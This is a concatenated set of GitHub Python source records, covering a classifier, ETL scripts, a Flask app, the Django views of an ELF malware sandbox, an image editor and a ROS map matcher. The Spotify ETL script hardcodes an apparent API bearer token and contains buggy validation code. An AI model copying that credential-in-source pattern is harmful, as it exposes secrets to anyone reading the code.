abs(x1 - x2) + abs(y1 - y2)\r\n\r\ndef findEvents(events, user):\r\n\r\n\tinfo = []\r\n\r\n\tfor i in range(len(events)):\r\n\t\teventID = events[i][3]\r\n\t\tdis = distance(user, events[i][:2])\r\n\t\tprice = events[i][2][0][0]\r\n\t\tnumber = events[i][2][0][1]\r\n\r\n\t\tinfo.append((eventID, dis, price, number))\r\n\r\n\tinfo = sorted(info, key=lambda x: x[1])\r\n\r\n\treturn info[:5]\r\n\r\ndef idGenerator(num):\r\n\tif num >= 10:\r\n\t\treturn '0' + str(num)\r\n\telse:\r\n\t\treturn '00' + str(num)\r\n\r\ndef main():\r\n\r\n\tevents = eventsGenerator()\r\n\r\n\twhile True:\r\n\r\n\t\ttry:\r\n\r\n\t\t\tuser = input(\"\\nWhere are you? (Enter exit to exit) \")\r\n\r\n\t\texcept:\r\n\r\n\t\t\tprint(\"\\nUnable to retrieve input, exiting the program\")\r\n\t\t\tbreak\r\n\r\n\t\tif user == \"exit\":\r\n\t\t\tbreak\r\n\r\n\t\tif (not user.replace(\",\", \"\").replace(\" \", \"\").replace(\"(\", \"\").replace(\")\", \"\").replace(\"+\", \"\").replace(\"-\", \"\").isdigit()) or (len(user) < 2):\r\n\t\t\tprint(\"Invalid Input. Coordinates must be digits within range -10 to 10\\n\")\r\n\t\t\tcontinue\r\n\r\n\t\tuser = list(map(int, user.split(\",\")))\r\n\r\n\t\tif (user[0] > 10 or user[0] < -10) or (user[1] > 10 or user[1] < -10):\r\n\t\t\tprint(\"Invalid Input. Coordinates must be digits within range -10 to 10\\n\")\r\n\t\t\tcontinue\r\n\r\n\t\tclosest = findEvents(events, user)\r\n\r\n\t\tprint(\"\\nEvents closest to ({}, {}):\\n\".format(user[0], user[1]))\r\n\r\n\t\tfor event in closest:\r\n\t\t\teventID = idGenerator(event[0])\r\n\t\t\tprint(\"Event Info: ID -> {}, Price -> ${}, {} tickets remaining, Distance -> {}\".format(eventID, event[2], event[3], event[1]))\r\n\r\n\tprint(\"Shutting Down...\")\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()","repo_name":"LanghaoZ/Miscellaneous","sub_path":"Viagogo OA 2018/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37454140661","text":"\nimport numpy as np\n\nfrom scipy.sparse import csr_matrix\n\nfrom inspect import getmembers, isfunction, getargspec\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.metrics import f1_score\n\nimport features\n\n\nclass Classifier:\n def __init__(self, classifier, with_feat, with_bigram, is_threaded=False):\n \"\"\"\n Initialize the classifier instance with important values such as the algorithm or the feature\n representation\n :param classifier: scikit-learn object that is going to be used as classifer\n :param with_feat: boolean variable indicating whether indicator features are being used\n :param with_bigram: boolean variable indicating whether bigrams are being used\n :param is_threaded: boolean variable indicating whether multithread mode is enabled\n \"\"\"\n self.classifier = classifier\n self.inv_vocab = {}\n self.tfidf_transformer = TfidfTransformer()\n self.count_vect = CountVectorizer()\n if with_bigram:\n self.bigram_vect = CountVectorizer(ngram_range=(2, 2), max_features=100)\n self.tfidf_bigram = TfidfTransformer()\n\n self.with_feat = with_feat\n self.with_bigram = with_bigram\n self.is_threaded = is_threaded\n\n def learn_classifier(self, train_ds, train_labels, test_ds, test_labels, queue=[]):\n \"\"\"\n Train, test and compute the performance of the algorithm (F1 score) with the given train and test set\n :param train_ds: numpy array with the training set\n :param train_labels: numpy array with the training labels\n :param test_ds: numpy array with the testing set\n :param test_labels: numpy array with the testing labels\n :param queue: when threaded mode is enabled, queue where to put the results.\n :return: F1 score if no thread mode is in use\n \"\"\"\n # Train model\n clf = self.train(train_ds, train_labels)\n # Test it\n predictions = self.test(clf, test_ds)\n # Output results\n if self.is_threaded:\n queue.put(self.accuracy(predictions, test_labels))\n else:\n return self.accuracy(predictions, test_labels)\n\n def build_feature_matrix(self, dataset):\n \"\"\"\n Given a new dataset, build the feature matrix with the values of the indicator functions for each\n sample in matrix\n :param dataset: numpy array with all documents in training set\n :return: numpy array with the feature values for each document in training set\n \"\"\"\n # Create the dictionary of feature functions if it is not created\n if len(features.features_fun_dict) == 0:\n i = 0\n for o in getmembers(features):\n if isfunction(o[1]):\n features.features_fun_dict[i] = o[1]\n i += 1\n features.num_features = len(features.features_fun_dict)\n\n matrix = np.zeros([dataset.shape[0], features.num_features])\n\n # For each sample in dataset, call every feature function and store its value\n for i in range(dataset.shape[0]):\n for j in range(features.num_features):\n args = getargspec(features.features_fun_dict[j]).args\n if len(args) == 2:\n matrix[i, j] = features.features_fun_dict[j](dataset[i], self.inv_vocab)\n else:\n matrix[i, j] = features.features_fun_dict[j](dataset[i])\n\n # Return sparse matrix with the features (needed by the classifier)\n return csr_matrix(matrix)\n\n def train(self, train_set, train_labels):\n \"\"\"\n Train classifier\n :param train_set: numpy array with all documents in training set\n :param train_labels: numpy array with labels in training set\n :return: trained classifier\n \"\"\"\n # Transform dataset, obtaining the count of every word in vocabulary and performing tfidf conversion\n train_counts = self.count_vect.fit_transform(train_set)\n train_tfidf = self.tfidf_transformer.fit_transform(train_counts)\n\n # Build inverse vocabulary with all words in dictionary (needed to recover the word from the index\n # in some feature functions)\n self.inv_vocab = {v: k for k, v in self.count_vect.vocabulary_.items()}\n\n # If using feature representation, obtain the corresponding feature matrix and append\n if self.with_feat:\n matrix = self.build_feature_matrix(train_counts)\n matrix_norm = Normalizer().fit(matrix).transform(matrix)\n train_tfidf = csr_matrix(np.concatenate((train_tfidf.toarray(), matrix_norm.toarray()), axis=1))\n\n # If using bigram representation, obtain the top 100 bigrams and append\n if self.with_bigram:\n bigram_counts = self.bigram_vect.fit_transform(train_set)\n bigram_tfidf = self.tfidf_bigram.fit_transform(bigram_counts)\n train_tfidf = csr_matrix(np.concatenate((train_tfidf.toarray(), bigram_tfidf.toarray()), axis=1))\n\n # Return trained classifier\n return self.classifier.fit(train_tfidf, train_labels)\n\n def test(self, clf, test_set):\n \"\"\"\n Test classifier\n :param clf: scikit-learn object containing a trained classifier with the desired algorithm\n :param test_set: numpy array with all documents in test set\n :return: numpy array with the predictions\n \"\"\"\n # Transform test set the same way the training set is transformed\n test_counts = self.count_vect.transform(test_set)\n test_tfidf = self.tfidf_transformer.transform(test_counts)\n\n # If using feature representation, obtain the corresponding feature matrix and append\n if self.with_feat:\n test_matrix = self.build_feature_matrix(test_counts)\n test_matrix_norm = Normalizer().fit(test_matrix).transform(test_matrix)\n test_tfidf = csr_matrix(np.concatenate((test_tfidf.toarray(), test_matrix_norm.toarray()), axis=1))\n\n # If using feature representation, obtain the corresponding top 100 bigrams and append\n if self.with_bigram:\n bigram_counts = self.bigram_vect.fit_transform(test_set)\n bigram_tfidf = self.tfidf_bigram.fit_transform(bigram_counts)\n test_tfidf = csr_matrix(np.concatenate((test_tfidf.toarray(), bigram_tfidf.toarray()), axis=1))\n\n # Return predictions\n return clf.predict(test_tfidf)\n\n @staticmethod\n def accuracy(predictions, test_labels):\n \"\"\"\n Compute the desired measure of performance (F1 in this case)\n :param predictions: numpy array with the predictions made by our classifier\n :param test_labels: numpy array with the real labels\n :return: F1 score of the predictions made\n \"\"\"\n return f1_score(test_labels, predictions, average='micro') * 100\n\n","repo_name":"jsendino/NewsAggregator","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7331932132","text":"import os\nimport pandas as pd\nimport numpy as np\n\n\ndef listdir(path, list_name): # 传入存储的list\n for file in os.listdir(path):\n file_path = os.path.join(path, file)\n if os.path.isdir(file_path):\n listdir(file_path, list_name)\n else:\n list_name.append(file_path)\n\nfile_paths = []#F:\\gitworkspace\\python\\e-nose-cnn\\data\nlistdir(\"D:\\\\WeChat\\\\WeChat Files\\\\mzf14ihntts\\\\FileStorage\\\\File\\\\2019-11\\\\dataset\\\\train_set\", file_paths)\n# print(file_paths)\n\n##csv add hearder\ndata = range(60)\ndata = pd.DataFrame(data)\ndata = data.values\ndata = list(map(list,zip(*data)))\ndata = pd.DataFrame(data)\ndata.to_csv(os.path.join(\"D:\\\\WeChat\\\\WeChat Files\\\\mzf14ihntts\\\\FileStorage\\\\File\\\\2019-11\\\\dataset\", \"train_set.csv\"), encoding='utf_8_sig', index=False, header=0)\n\nfor i in file_paths:\n try:\n data = pd.read_csv(i, usecols=['0','1','2','3','4','5','6','7','8','9'])\n data = data.values\n data = list(map(list,zip(*data)))\n data = pd.DataFrame(data)\n data.to_csv(os.path.join(\"D:\\\\WeChat\\\\WeChat Files\\\\mzf14ihntts\\\\FileStorage\\\\File\\\\2019-11\\\\dataset\", \"train_set.csv\"), encoding='utf_8_sig',index=False, header=0, mode = 'a+') \n except Exception as e:\n print(i)","repo_name":"19120332843/learning_python","sub_path":"e-nose-cnn/all_csv2one_csv.py","file_name":"all_csv2one_csv.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40596767973","text":"import sqlalchemy\nimport pandas as pd\nimport sqlite3\nimport requests\nimport json\nimport datetime\nimport pandas as pd\n\nfrom os import access\n\n\nDB_LOCATION = \"sqlite:///my_played_tracks.sqlite\"\nUSER_ID = \"Sztaber\"\nTOKEN = 'BQC2BaRBT6d4rH0NIh-SN2H6wz12g-7pmV1PGYVRrMtuAjYgsQzHu57ZjnUK-KaQw-hn6G0i7rPhoLlHrn17Mv_LB2zF-H7V0VcKvFhn1mePXDm-Yi07hDgncORDzzjMZg5bacqmwB9Ko3MXdDrUrJ-bVA2nJzXg94GbR5H2'\n\n# Create function for validate the data\n\ndef check_if_valid_data (df: pd.DataFrame) -> bool:\n if df.empty:\n print(\"No songs downloaded. Finishing execution.\")\n return False\n elif pd.Series(df('played_at')).is_unique:\n pass\n else:\n raise Exception('Primary key check is violated')\n\n if df.isnull().values.any():\n raise Exception('Null values Found')\n\n properTime = datetime.datetime.now() - datetime.timedelta(days=30)\n properTime = properTime.replace(hour=0, minute=0, second=0, microsecond=0)\n\n timestamps = df['timestamps'].toList()\n\n for timestamp in timestamps:\n if datetime.datetime.strptime(timestamp, \"%Y-%m-%d\") != properTime:\n raise Exception ('At least one song does not have proper timestamp')\n\n return True\n\nif __name__ == '__main__':\n\n\n\n\n#Extract the data from Spotify API\n\n headers = {\n 'Accept' : 'application/json',\n 'Content-Type' : 'application/json',\n 'Authorization' : f'Bearer {TOKEN}'\n }\n\n today = datetime.datetime.now()\n time_range = today - datetime.timedelta(days=7)\n time_range_unix = int(time_range.timestamp()) * 1000\n\n # Get played songs from the last 7 days\n r = requests.get(f'https://api.spotify.com/v1/me/player/recently-played?after={time_range_unix}', headers=headers)\n\n data = r.json()\n\n\n\n\n # Put the data into dataframe\n\n songs_names = []\n artists_names = []\n played_at_list = []\n timestamps_list = []\n\n for song in data['items']:\n songs_names.append(song['track']['name'])\n artists_names.append(song['track']['album']['artists'][0]['name'])\n played_at_list.append(song['played_at'])\n timestamps_list.append(song['played_at'][0:10])\n\n song_dict = {\n 'song_name' : songs_names,\n 'artist_name' : artists_names,\n 'played_at' : played_at_list,\n 'timestamps' : timestamps_list \n }\n\n song_df = pd.DataFrame(song_dict, columns=['song_name', 'artist_name', 'played_at', 'timestamps'])\n\n print(song_df)\n\n\n\n \n\n\n\n\n\n engine = sqlalchemy.create_engine(DB_LOCATION)\n conn = sqlite3.connect('my_played_tracks.sqlite')\n cursor = conn.cursor()\n\n sql_query = \"\"\"\n CREATE TABLE IF NOT EXISTS my_played_tracks (\n song_name VARCHAR(200),\n artist_name VARCAHR(200),\n played_at VARCHAR(200),\n timestamp VARCHAR(200),\n CONSTRAINT primary_key_constraint PRIMARY KEY (played_at)\n )\n \"\"\"\n\n cursor.execute(sql_query)\n print(\"Database opened successfully!\")\n \n\n\n\n\n\n ","repo_name":"Sztabers/Spotify_ETL","sub_path":"dags/spotify_etl.py","file_name":"spotify_etl.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12097810452","text":"#!/usr/bin/env python3\n'''\nBasic flask application uses\nbabel to switch between languages\n'''\nfrom flask import Flask, render_template, request\nfrom flask_babel import Babel, _\n\n\napp = Flask(__name__)\nbabel = Babel(app)\n\n\nclass Config:\n '''\n Configuration file for\n flask babel vars\n '''\n LANGUAGES = [\"en\", \"fr\"]\n BABEL_DEFAULT_LOCALE = \"en\"\n BABEL_DEFAULT_TIMEZONE = \"UTC\"\n\n\napp.config.from_object(Config) # Configuration initialized in app instance\n\n\n@babel.localeselector\ndef get_locale() -> str:\n '''\n selects a locale to use as default\n Detects locale variable in requests\n '''\n supported_locales = ['en', 'fr']\n if 'locale' in request.args:\n locale = request.args.get('locale')\n if locale in supported_locales:\n return locale\n return request.accept_languages.best_match(app.config['LANGUAGES'])\n\n\n@app.route('/', strict_slashes=False)\ndef hello_world() -> str:\n '''\n Home route serves index page\n index page\n '''\n return render_template('4-index.html')\n\n\nif __name__ == \"__main__\":\n '''\n Starts code if not imported\n '''\n app.run()\n","repo_name":"Adisa-Shobi/alx-backend","sub_path":"0x02-i18n/4-app.py","file_name":"4-app.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16458566916","text":"import os\nimport logging\nfrom django.http import HttpResponse, FileResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import login\nfrom web.forms import FileSubmissionForm, RegistrationForm\nfrom django.contrib.auth.decorators import login_required\nfrom web.utils import prep_file_submission\nfrom web.tasks import start_analysis, get_my_tasks_info\nfrom analysis.reporting.report import get_backend_report, get_all_reports, download_artifact\n\n\nlogging.basicConfig(level=os.environ.get(\"LOGLEVEL\", \"INFO\"))\nLOG = logging.getLogger(__name__)\n\n\ndef index(request):\n \"\"\"\n This function is called when a user visits the homepage of ELFEN.\n\n :param request: WSGIRequest\n :type request: django.core.handlers.wsgi.WSGIRequest\n :return: HTTP response\n :rtype: django.http.response.HttpResponse\n \"\"\"\n tasks_info = get_my_tasks_info()\n LOG.debug(\"Index view called\")\n return render(request, \"web/home.html\", {\"recent_tasks\": tasks_info})\n\n\ndef sign_up(request):\n \"\"\"\n This function is called when a user wants to create a new account in ELFEN.\n\n :param request: WSGIRequest\n :type request: django.core.handlers.wsgi.WSGIRequest\n :return: HTTP response\n :rtype: django.http.response.HttpResponse\n \"\"\"\n LOG.debug(\"Sign up view called\")\n form = RegistrationForm()\n\n password_tips = form.fields.get(\"password1\", \"\").help_text.split(\"\\n\")\n\n if request.method == \"POST\":\n LOG.debug(\"POST request received to sign up\")\n form = RegistrationForm(request.POST)\n if form.is_valid():\n LOG.debug(\"POST request received to sign up is valid\")\n user = form.save()\n login(request, user)\n return redirect(\"home\")\n\n return render(request, \"registration/sign_up.html\", {\"form\": form,\n \"password_tips\": password_tips})\n\n\n@login_required\ndef submit_elf(request):\n \"\"\"\n This function accepts file uploads from users and asynchronously\n starts analysis.\n\n :param request: WSGIRequest\n :type request: django.core.handlers.wsgi.WSGIRequest\n :return: HTTP response\n :rtype: django.http.response.HttpResponse\n \"\"\"\n LOG.debug(\"Submit ELF view called\")\n form = FileSubmissionForm()\n\n if request.method == \"POST\":\n LOG.debug(\"POST request received to submit ELF\")\n form = FileSubmissionForm(request.POST, request.FILES)\n\n # Only authenticated users submitting valid forms are allowed\n if form.is_valid():\n LOG.debug(\"POST request received to submit ELF is valid\")\n file = request.FILES[\"file\"]\n additional_files = request.FILES.getlist(\"additional_files\")\n userland_tracing = True if request.POST.get(\"userland_tracing\", None) else False\n enable_internet = True if request.POST.get(\"enable_internet\", None) else False\n exec_args = request.POST.get(\"execution_arguments\", \"\")\n status, ret = prep_file_submission(file, request.user.username,\n request.POST[\"execution_time\"],\n request.POST.get(\"machine\"),\n execution_arguments=exec_args,\n userland_tracing=userland_tracing,\n enable_internet=enable_internet,\n additional_files=additional_files)\n\n if status is False:\n # TODO: Prepare error page if writing sample to disk fails\n return HttpResponse(ret[\"error_msg\"])\n elif status is True:\n context = ret\n LOG.debug(f\"Execution context: {context}\")\n start_analysis.delay(context)\n return redirect(\"report\", context[\"submission_uuid\"])\n\n return render(request, \"web/submit_elf.html\", {\"form\": form})\n\n\ndef elf_reports(request, submission_uuid):\n \"\"\"\n This function returns the analysis report for a given task UUID.\n\n :param request: WSGIRequest\n :type request: django.core.handlers.wsgi.WSGIRequest\n :param submission_uuid: Submission (aka task) UUID\n :type submission_uuid: str\n :return: HTTP response\n :rtype: django.http.response.HttpResponse\n \"\"\"\n all_reports = get_all_reports(submission_uuid, web=True)\n\n if all_reports is None:\n context = {\n \"msg\": f\"Task UUID: {submission_uuid} not found. You may have to \"\n \"wait for a few seconds until the task is registered in the database. \"\n \"Refresh the page to check again.\"\n }\n return render(request, \"web/404.html\", context=context, status=404)\n\n return render(request, \"web/report_file.html\", all_reports)\n\n\ndef elf_backend_report(request, submission_uuid, backend):\n \"\"\"\n This function returns the analysis report for a given backend for a\n given task UUID.\n\n :param request: WSGIRequest\n :type request: django.core.handlers.wsgi.WSGIRequest\n :param submission_uuid: Submission (aka task) UUID\n :type submission_uuid: str\n :param backend: ELFEN backend name\n :type backend: str\n :return: HTTP response\n :rtype: django.http.response.HttpResponse\n \"\"\"\n report = get_backend_report(submission_uuid, backend)\n\n context = {\n \"submission_uuid\": submission_uuid,\n \"backend\": backend,\n \"report\": report\n }\n\n return render(request, \"web/report_backend.html\", context)\n\n\ndef not_found(request, exception):\n return render(request, \"web/404.html\", status=404)\n\n\ndef download(request, submission_uuid, backend):\n \"\"\"\n This function downloads the artifact for a given backend for a\n given task UUID.\n\n :param request: WSGIRequest\n :type request: django.core.handlers.wsgi.WSGIRequest\n :param submission_uuid: Submission (aka task) UUID\n :type submission_uuid: str\n :param backend: ELFEN backend name\n :type backend: str\n :return: Artifact file or HTTP response\n :rtype: django.http.response.FileResponse or django.http.response.HttpResponse\n \"\"\"\n fd = download_artifact(submission_uuid, backend)\n\n if fd:\n return FileResponse(fd, as_attachment=True)\n\n return render(request, \"web/404.html\", status=404)\n","repo_name":"nikhilh-20/ELFEN","sub_path":"web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6366,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"37"} +{"seq_id":"26640009693","text":"from PIL import Image, ImageTk\nimport os\n\nclass CharacterManip:\n \"\"\"The goal of this object is to represent the Character as a whole.\n\n Will take in information about what the character should look like. Will then manipulate\n the image to represent the given input. After will return data that TKinter will be able\n to display.\n\n Each funtion should return the new image. You should NEVER have to edit self.character/\n whatever we come up with. We want to keep loading to a minumum.\n \"\"\"\n\n def __init__(self):\n \"\"\"Should initialize with the Species, Gender, and Color of the character.\n\n\n :param species:\n \"\"\"\n self.species = \"\"\n self.gender = \"\"\n self.color = 0 # int\n\n self.human_colors = [\"#ffdbac\",\n \"#f1c27d\",\n \"#e0ac69\",\n \"#c68642\",\n \"#8d5524\"]\n\n self.bear_colors = [\"#ffe7b5\",\n \"#ffde58\",\n \"#d76300\",\n \"#633800\",\n \"#eff5eb\"]\n\n self.max_w = 250\n self.max_h = 400\n self.w = 0\n self.h = 0\n # Original image of the character\n self.character = Image.new(\"RGB\", (self.max_w, self.max_h))\n self.base = Image.new(\"RGB\", (self.max_w, self.max_h))\n self.mod = Image.new(\"RGB\", (self.max_w, self.max_h))\n self.m_skin = Image.new(\"L\", (self.max_w, self.max_h))\n # List of clothes filenames\n self.f_shirts = []\n self.f_pants = []\n self.f_shoes = []\n # List of clothes masks\n self.shirts = []\n self.pants = []\n self.shoes = []\n\n self.curr_shirt = 0\n self.curr_pants = 0\n self.curr_shoes = 0\n\n self.def_col = \"#ff0000\"\n self.col_shirt = self.def_col\n self.col_pants = self.def_col\n self.col_shoes = self.def_col\n # self.col_skin = self.human_colors[color] # String\n self.col_skin = self.human_colors[0]\n\n # self.update_character(species, gender, color)\n\n # Masks for the different clothing items\n # Might need to be in lists or called only when needed\n\n # self.tshirt_mask = Image.open(os.path.join(\"assets\", \"tshirt_mask.gif\"))\n # self.tshirt_mask = self.tshirt_mask.convert(\"L\")\n\n # This is the color that the character is pasted onto.#\n\n def _open(self, f_name, mode):\n return Image.open(os.path.join(\"assets\", f_name)).convert(mode)\n\n def define_character(self, char):\n \"\"\"Run whenever a character needs to be put back together.\n\n Usually for the display character at the end of creation or before editing.\n\n :return:\n \"\"\"\n\n self.species = char.species\n self.gender = char.gender\n self.color = char.race\n\n self._update_clothes_arrays()\n\n self.curr_shirt = self.f_shirts.index(char.shirt_f_name)\n self.curr_pants = self.f_pants.index(char.pants_f_name)\n self.curr_shoes = self.f_shoes.index(char.shoes_f_name)\n\n self.col_shirt = char.shirt_color\n self.col_pants = char.pants_color\n self.col_shoes = char.shoes_color\n\n self.setAllColor()\n\n def update_character(self, s, g, c):\n \"\"\"Run whenever an attribute of the chracter's phyisical being is changed.\n\n Use this function during the character creation process.\n \"\"\"\n\n self.species = s\n self.gender = g\n self.color = c\n\n self.curr_shirt = 0\n self.curr_pants = 0\n self.curr_shoes = 0\n\n self._update_clothes_arrays()\n\n self.setAllColor()\n\n def _update_clothes_arrays(self):\n self.shirts = []\n self.pants = []\n self.shoes = []\n\n if self.species == \"Human\" and self.gender == \"Female\":\n self.character = self._open(\"fe_base.gif\", \"RGB\")\n self.m_skin = self._open(\"fe_m_skin.gif\", \"L\")\n # Load clothing file names\n self.f_shirts = [\"fe_m_blouse.gif\",\n \"fe_m_crop.gif\"]\n self.f_pants = [\"fe_m_jeans.gif\",\n \"fe_m_skirt.gif\"]\n self.f_shoes = [\"fe_m_tennis_shoes.gif\",\n \"fe_m_boots.gif\"]\n\n elif self.species == \"Human\" and self.gender == \"Male\":\n self.character = self._open(\"ma_base.gif\", \"RGB\")\n self.m_skin = self._open(\"ma_m_skin.gif\", \"L\")\n # Load clothing file names\n self.f_shirts = [\"ma_m_t_shirt.gif\",\n \"ma_m_long_sleeve.gif\"]\n self.f_pants = [\"ma_m_shorts.gif\",\n \"ma_m_long_jeans.gif\"]\n self.f_shoes = [\"ma_m_loafers.gif\",\n \"ma_m_tennis_shoes.gif\"]\n\n elif self.species == \"Bear\" and self.gender == \"Male\":\n self.character = self._open(\"bm_base.gif\", \"RGB\")\n self.m_skin = self._open(\"bm_m_skin.gif\", \"L\")\n # Load clothing file names\n self.f_shirts = [\"bm_m_t_shirt.gif\",\n \"bm_m_button_up.gif\"]\n self.f_pants = [\"bm_m_shorts.gif\",\n \"bm_m_jeans.gif\"]\n self.f_shoes = [\"bm_m_tennis_shoes.gif\"]\n\n elif self.species == \"Bear\" and self.gender == \"Female\":\n self.character = self._open(\"bf_base.gif\", \"RGB\")\n self.m_skin = self._open(\"bf_m_skin.gif\", \"L\")\n # Load clothing file names\n # Using the male clothes cuz im lazy\n self.f_shirts = [\"bm_m_t_shirt.gif\",\n \"bm_m_button_up.gif\"]\n self.f_pants = [\"bm_m_shorts.gif\",\n \"bm_m_jeans.gif\"]\n self.f_shoes = [\"bm_m_tennis_shoes.gif\"]\n\n for f_name in self.f_shirts:\n self.shirts.append(self._open(f_name, \"L\"))\n for f_name in self.f_pants:\n self.pants.append(self._open(f_name, \"L\"))\n for f_name in self.f_shoes:\n self.shoes.append(self._open(f_name, \"L\"))\n\n self.w, self.h = self.character.size\n # Scaling\n self.ratio = min(self.max_w / self.w, self.max_h / self.h)\n self.w = int(self.w * self.ratio)\n self.h = int(self.h * self.ratio)\n # Resize character image\n self.character = self.character.resize((self.w, self.h), Image.ANTIALIAS)\n self.base = self.character.copy()\n if self.m_skin:\n self.m_skin = self.m_skin.resize((self.w, self.h), Image.ANTIALIAS)\n\n # Resize clothes\n for i in range(len(self.shirts)):\n self.shirts[i] = self.shirts[i].resize((self.w, self.h), Image.ANTIALIAS)\n for i in range(len(self.pants)):\n self.pants[i] = self.pants[i].resize((self.w, self.h), Image.ANTIALIAS)\n for i in range(len(self.shoes)):\n self.shoes[i] = self.shoes[i].resize((self.w, self.h), Image.ANTIALIAS)\n\n def setAllColor(self):\n if self.species == \"Human\" and self.m_skin:\n self.setSkinColor(self.human_colors[self.color])\n elif self.species == \"Bear\" and self.m_skin:\n self.setSkinColor(self.bear_colors[self.color])\n\n self.setShirtColor(self.col_shirt)\n self.setPantsColor(self.col_pants)\n self.setShoesColor(self.col_shoes)\n\n def setSkinColor(self, rgbHex):\n self.col_skin = rgbHex\n self.mod = Image.new(\"RGB\", (self.w, self.h), self.col_skin)\n self.character.paste(self.mod, mask=self.m_skin)\n\n\n def setShirtColor(self, rgbHex):\n \"\"\"Creates and returns a tKinter image with the correct color shirt.\"\"\"\n self.col_shirt = rgbHex\n if self.shirts:\n self.mod = Image.new(\"RGB\", (self.w, self.h), self.col_shirt)\n # Pastes the color (mod) into the white area of the mask.\n self.character.paste(self.mod, mask=self.shirts[self.curr_shirt])\n return ImageTk.PhotoImage(self.character)\n\n def setPantsColor(self, rgbHex):\n \"\"\"Creates and returns a tKinter image with the correct color pants.\"\"\"\n self.col_pants = rgbHex\n if self.pants:\n self.mod = Image.new(\"RGB\", (self.w, self.h), self.col_pants)\n self.character.paste(self.mod, mask=self.pants[self.curr_pants])\n return ImageTk.PhotoImage(self.character)\n\n def setShoesColor(self, rgbHex):\n \"\"\"Creates and returns a tKinter image with the correct color shoes.\"\"\"\n self.col_shoes = rgbHex\n if self.shoes:\n self.mod = Image.new(\"RGB\", (self.w, self.h), self.col_shoes)\n self.character.paste(self.mod, mask=self.shoes[self.curr_shoes])\n\n return ImageTk.PhotoImage(self.character)\n\n def _shirtLeft(self):\n self.curr_shirt -= 1\n if (self.curr_shirt <= -1):\n self.curr_shirt = len(self.shirts) - 1\n self.character = self.base.copy()\n self.setAllColor()\n\n def _shirtRight(self):\n self.curr_shirt += 1\n if (self.curr_shirt >= len(self.shirts)):\n self.curr_shirt = 0\n self.character = self.base.copy()\n self.setAllColor()\n\n def _pantsLeft(self):\n self.curr_pants -= 1\n if (self.curr_pants <= -1):\n self.curr_pants = len(self.pants) - 1\n self.character = self.base.copy()\n self.setAllColor()\n\n def _pantsRight(self):\n self.curr_pants += 1\n if (self.curr_pants >= len(self.pants)):\n self.curr_pants = 0\n self.character = self.base.copy()\n self.setAllColor()\n\n def _shoesLeft(self):\n self.curr_shoes -= 1\n if (self.curr_shoes <= -1):\n self.curr_shoes = len(self.shoes) - 1\n self.character = self.base.copy()\n self.setAllColor()\n\n def _shoesRight(self):\n self.curr_shoes += 1\n if (self.curr_shoes >= len(self.shoes)):\n self.curr_shoes = 0\n self.character = self.base.copy()\n self.setAllColor()\n\n def returnGIF(self):\n return ImageTk.PhotoImage(self.character)\n","repo_name":"GRNCheetah/database-character-creator","sub_path":"ImageEdit.py","file_name":"ImageEdit.py","file_ext":"py","file_size_in_byte":10104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3239535606","text":"import rospy\nfrom collections import OrderedDict\n\nimport time\nfrom std_msgs.msg import Float64\n\nclass map_match:\n\tdef __init__(self, path):\n\t\tself.path = path\n\t\tself.nodes_gdf = self.path.get_path_nodes()\n\t\tself.edges_gdf = self.path.get_path_edges()\n\t\t\n\t\t# self.time_pub = rospy.Publisher('time_computation', Float64, queue_size=1)\n\n\t\tself.init_search_radius = rospy.get_param(\"/road_estimation/search_radius\")\n\n\t\t# self.file = open(\"/home/mustafaismail/Documents/GP/catkin_ws/src/gps_road_estimation/src/time.txt\", \"w\") \n\n\tdef get_projected_p(self, odom_point):\n\t\tself.search_radius = self.init_search_radius\n\t\t\n\t\tdistance = []\n\t\tfor edge in self.get_candidate_edges(odom_point):\n\t\t\tline_string = self.edges_gdf[(self.edges_gdf.u == edge[0]) & (self.edges_gdf.v == edge[1])].geometry\n\t\t\tdistance.append([line_string.distance(odom_point), edge, line_string])\n\n\t\ttup = min(distance, key = lambda t: t[0].values)\n\t\ttrue_edge = tup[1]\n\t\ttrue_edge_geom = tup[2].item()\n\n\t\tprojected_point = true_edge_geom.interpolate(true_edge_geom.project(odom_point)) # projected point\n\n\t\treturn projected_point, true_edge[0]\n\n\tdef get_candidate_edges(self, odom_point):\n\t\twhile True:\n\t\t\tcircle = odom_point.buffer(self.search_radius) \n\t\t\tpossible_matches_index = list(self.edges_gdf.sindex.intersection((circle.bounds))) \n\t\t\tpossible_matches = self.edges_gdf.iloc[possible_matches_index] \n\t\t\tprecise_matches = possible_matches[possible_matches.intersects(circle)]\n\t\t\tcandidate_ed = list(precise_matches.index)\n\n\t\t\tif len(candidate_ed) != 0:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tself.search_radius += self.init_search_radius\n\n\t\tcandidate_edges = []\n\t\tfor edge_id in candidate_ed:\n\t\t\tpoint_tuple = (edge_id, edge_id+1)\n\t\t\tcandidate_edges.append(point_tuple)\n\t\t\t# first node\n\t\t\t# if node_id == 0:\n\t\t\t# \tpoint_tuple_out = (node_id, node_id+1)\n\t\t\t# \tcandidate_edges.append(point_tuple_out)\n\t\t\t# # last node\n\t\t\t# elif node_id == len(self.nodes_gdf)-1:\n\t\t\t# point_tuple_in = (node_id-1, node_id)\n\t\t\t# candidate_edges.append(point_tuple_in)\n\t\t\t# # any other node\n\t\t\t# else:\n\t\t\t# point_tuple_in = (node_id-1, node_id)\n\t\t\t# point_tuple_out = (node_id, 